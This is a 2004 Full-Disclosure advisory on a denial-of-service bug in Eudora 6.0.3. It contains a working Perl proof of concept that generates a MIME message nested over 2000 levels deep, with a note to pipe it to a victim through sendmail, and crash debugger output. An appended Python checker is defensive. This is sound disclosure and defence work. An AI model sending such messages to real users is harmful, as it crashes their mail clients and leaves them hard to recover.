[Full-Disclosure] Eudora 6.0.3 nested MIME DoS

From: Paul Szabo (psz_at_maths.usyd.edu.au)
Date: 04/14/04

    To: NTBugtraq@listserv.ntbugtraq.com, beckley@qualcomm.com, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    Date: Wed, 14 Apr 2004 13:12:23 +1000 (EST)
    
    

    Eudora 6.0.3 for Windows will crash if sent a MIME message nested more than
    2000 levels deep. Due to the presence of the [EudoraDir]\spool\*.RCV file,
    users may find it difficult to recover from this DoS situation. Demo below.

    Cheers,

    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    print "From: me\n";
    print "To: you\n";
    print "Subject: nested multipart test\n";
    print "Mime-Version: 1.0\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n";

    &nest(0);
    print "\n";

    sub nest {
      my ($x) = @_;
      my $b = sprintf("bndry%04d",$x);
      print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n";
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Level $x\n\n";

    # No problem for 1995, but crash for 2005 deep nesting:
    #
    # (378.1c4): Stack overflow - code c00000fd (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=000338a8 edi=62000000
    # eip=77f862ed esp=00032f10 ebp=000337b0 iopl=0 nv up ei pl nz na pe nc
    # cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202
    # ntdll!LdrLoadAlternateResourceModule+9:
    # 77f862ed 53 push ebx

      if ($x < 2005) {
        print "--$b\n";
        &nest($x+1);
      }
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Final $x\n";
      print "--$b--\n\n";
    }

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
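A mail gateway or client can refuse such a message before any recursive MIME parser sees it. The following is an added example, not part of the original post and not Eudora's code: it measures multipart nesting with an explicit stack instead of recursion. The names `multipart_depth`, `NestingTooDeep`, `MAX_DEPTH` and the limit of 50 are assumptions, and the sample message is constructed.

```python
import re

MAX_DEPTH = 50  # assumed policy limit, not a value from the advisory

# An unfolded Content-Type header that declares a multipart boundary.
_MULTIPART = re.compile(
    r'^content-type:\s*multipart/[^;]*;.*?\bboundary\s*=\s*"?([^";]+)"?', re.I)

class NestingTooDeep(ValueError):
    pass

def multipart_depth(raw, limit=MAX_DEPTH):
    """Return the deepest multipart nesting; raise NestingTooDeep past limit."""
    stack, deepest = [], 0              # open boundaries live on the heap
    in_headers, header = True, ""
    for line in raw.splitlines() + [""]:      # trailing "" flushes a last header
        if in_headers:
            if line[:1] in (" ", "\t"):       # folded header continuation
                header += " " + line.strip()
                continue
            m = _MULTIPART.match(header)      # previous header is now complete
            if m:
                stack.append(m.group(1).strip())
                deepest = max(deepest, len(stack))
                if len(stack) > limit:
                    raise NestingTooDeep(
                        "multipart depth %d exceeds %d" % (len(stack), limit))
            header, in_headers = line, line != ""
            continue
        s = line.rstrip()
        if not s.startswith("--"):
            continue
        for i in range(len(stack) - 1, -1, -1):   # innermost open boundary first
            if s == "--" + stack[i]:              # next part: read its headers
                del stack[i + 1:]
                in_headers, header = True, ""
                break
            if s == "--" + stack[i] + "--":       # close delimiter ends the level
                del stack[i:]
                break
    return deepest

# Constructed sample: two levels deep, with a folded Content-Type header.
SAMPLE = ('Mime-Version: 1.0\nContent-Type: multipart/mixed;\n  boundary="outer"\n'
          '\n--outer\nContent-Type: multipart/alternative; boundary="inner"\n'
          '\n--inner\nContent-Type: text/plain\n\nhello\n--inner--\n--outer--\n')
```

The scan stops at the first level past the limit, so the work done on a hostile message is bounded by the limit rather than by the attacker's chosen depth.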

